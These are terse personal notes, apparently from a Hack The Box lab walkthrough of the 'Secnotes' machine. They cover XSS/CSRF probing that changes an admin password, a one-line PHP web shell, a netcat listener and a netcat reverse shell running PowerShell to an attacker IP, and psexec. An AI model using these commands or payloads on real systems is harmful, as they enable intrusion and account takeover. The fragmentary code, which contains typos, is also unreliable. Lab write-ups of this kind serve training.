HTB Secnotes -SQL injection & CSRF
xss vuln ---
What requests are being sent?
direct URL? --> put "http://Attackers_IP:9001" in a comment section and see what it does!
nc -nvlp 9001
got a connection back!
create a test page
host the page on pythom httpserver and see what it does --> does the link actually work?
if it works, this would change the password of the particular user account like admin's
IIS server open and you have a smb share access on the web root.
try to create a web shell and upload it > access it!
<?php system($REQUEST['ippsec']) ?>
nc.exe attacker_IP 9001 -e powershell
admin password was hidden inside of it > psexec win!